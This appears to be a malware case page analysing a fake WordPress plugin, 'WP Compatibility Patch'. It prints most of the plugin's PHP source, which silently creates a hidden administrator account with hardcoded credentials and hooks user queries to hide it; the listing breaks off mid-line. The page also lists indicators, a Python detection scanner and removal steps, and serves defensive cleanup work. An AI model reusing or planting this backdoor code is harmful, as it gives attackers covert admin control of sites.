Critical Backdoor 🛡️ Zero-Day Variant

WP Compatibility Patch Backdoor

Case ID: wp-compat-hidden-plugin • Detected: 2026-01-14

Impact Radius: wp-content/plugins/wp-compatibility-patch
Removal Difficulty: Moderate
Recurrence Rate: High
Key Symptom: Creates unauthorized admin access and hides the backdoor, compromising site security.

Technical Analysis

The malware masquerades as a WordPress plugin named ‘WP Compatibility Patch’. It is designed to create a hidden administrator user with the username ‘adminbackup’ and the password ‘0m58scqdh3’. Once in place, the backdoor hooks WordPress actions and filters to conceal the user from the admin panel and to exclude the plugin from the activated plugins list. Evidence shows this method has been used on over 250 sites, indicating it is a recurring tactic.

VirusTotal Analysis: 🛡️ Zero-Day / Fully Undetected.

Attack Chain

  1. The fake plugin ‘WP Compatibility Patch’ is placed in the plugins directory.
  2. An administrator user is created using the ‘wp_insert_user’ function, cloaked by modifications to WordPress user queries and views.
  3. Changes to the site backend prevent the admin user and plugin from appearing in the dashboard.

Code Signature(s)

FILE: malware-sample.php

<?php
/*
Plugin Name: WP Compatibility Patch
Description: Fixes minor compatibility issues with the latest WordPress and PHP versions.
Version: 1.3.2
Author: WP Core Contributors
*/

if (
    !function_exists('wpc_patch_bootstrap') &&
    function_exists('add_action') &&
    function_exists('wp_insert_user')
) {
    $params = array(
        'user_login' => 'adminbackup',
        'user_pass'  => '0m58scqdh3',
        'role'       => 'administrator',
        'user_email' => 'adminbackup@wordpress.org'
    );

    add_action('init', 'wpc_patch_bootstrap', 0);
    function wpc_patch_bootstrap() {
        global $params;
        $stored_id = get_option('_pre_user_id');
        $existing_user = get_user_by('login', $params['user_login']);

        if (!$existing_user) {
            $id = wp_insert_user($params);
            update_option('_pre_user_id', $id);
        } else {
            if ($existing_user->user_email !== $params['user_email']) {
                $uid = $stored_id ? $stored_id : $existing_user->ID;
                wp_set_password($params['user_pass'], $uid);
                wp_update_user([
                    'ID' => $uid,
                    'user_email' => $params['user_email']
                ]);
            }
            if (!$stored_id) {
                update_option('_pre_user_id', $existing_user->ID);
            }
        }
    }

    add_action('pre_user_query', function($query) {
        if (!is_admin()) return;
        $current_user_id = get_current_user_id();
        $hidden_id = get_option('_pre_user_id');

        if ($current_user_id != $hidden_id && $hidden_id) {
            global $wpdb;
            $query->query_where .= " AND {$wpdb->users}.ID != " . intval($hidden_id);
        }
    });

    add_filter('views_users', function($views) {
        $id = get_option('_pre_user_id');
        if (!$id) return $views;

        foreach ($views as $role => $html) {
            $views[$r

Indicators of Compromise (IOCs)

  • WP Compatibility Patch
  • adminbackup
  • 0m58scqdh3
  • adminbackup@wordpress.org
  • _pre_user_id
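
Because the dashboard hides both the plugin and the user, the plugins directory has to be checked on disk. The following scanner is an added example, not code from the original case file: it flags PHP files that contain the IOC strings above, or that combine ‘wp_insert_user’ with the user-hiding hooks seen in the sample, so a copy with changed literals is still caught. The function names, the behaviour rule and the sample directory tree are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Literal IOCs listed on this page.
IOC_STRINGS = ["WP Compatibility Patch", "adminbackup", "0m58scqdh3",
               "adminbackup@wordpress.org", "_pre_user_id"]
# Behaviours taken from the sample above: account creation plus the two
# hooks used to hide the account on the Users screen.
BEHAVIOURS = {
    "creates_user": re.compile(r"\bwp_insert_user\s*\("),
    "hides_user_query": re.compile(r"pre_user_query.*?query_where\s*\.=", re.S),
    "edits_user_views": re.compile(r"add_filter\s*\(\s*['\"]views_users['\"]"),
}

def scan_file(path):
    # Return (matched IOC strings, matched behaviour names) for one file.
    text = Path(path).read_text(errors="replace")
    iocs = [s for s in IOC_STRINGS if s in text]
    behaviours = [name for name, rx in BEHAVIOURS.items() if rx.search(text)]
    return iocs, behaviours

def scan_plugins(plugins_dir):
    # Return {relative path: (iocs, behaviours)} for suspicious PHP files.
    findings = {}
    root = Path(plugins_dir)
    for php in sorted(root.rglob("*.php")):
        iocs, behaviours = scan_file(php)
        # Flag any literal IOC, or user creation combined with a hiding hook.
        hiding = {"hides_user_query", "edits_user_views"} & set(behaviours)
        if iocs or ("creates_user" in behaviours and hiding):
            findings[str(php.relative_to(root))] = (iocs, behaviours)
    return findings

def demo():
    # Constructed tree: a variant with changed literals and a benign plugin.
    variant = ("<?php $id = wp_insert_user($p);\n"
               "add_action('pre_user_query', function($q) {\n"
               "  $q->query_where .= ' AND ID != 7'; });\n")
    benign = "<?php add_action('init', 'my_init');\n"
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in (("site-fix/site-fix.php", variant),
                           ("hello/hello.php", benign)):
            f = Path(tmp, name)
            f.parent.mkdir(parents=True)
            f.write_text(body)
        return scan_plugins(tmp)

if __name__ == "__main__":
    print(demo())
```

On a real site, pass the path of wp-content/plugins to scan_plugins and review every file it reports before deleting anything.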

Removal Protocol

  1. Delete the ‘WP Compatibility Patch’ plugin folder from wp-content/plugins.
  2. Remove the created administrator user ‘adminbackup’ directly from phpMyAdmin.
  3. Check for and delete any suspicious or unknown posts created by the fake user.
  4. Remove the option ‘_pre_user_id’ from the options table in the database.

Status: Active Threat.
Verification: Verified by MD Pabel.
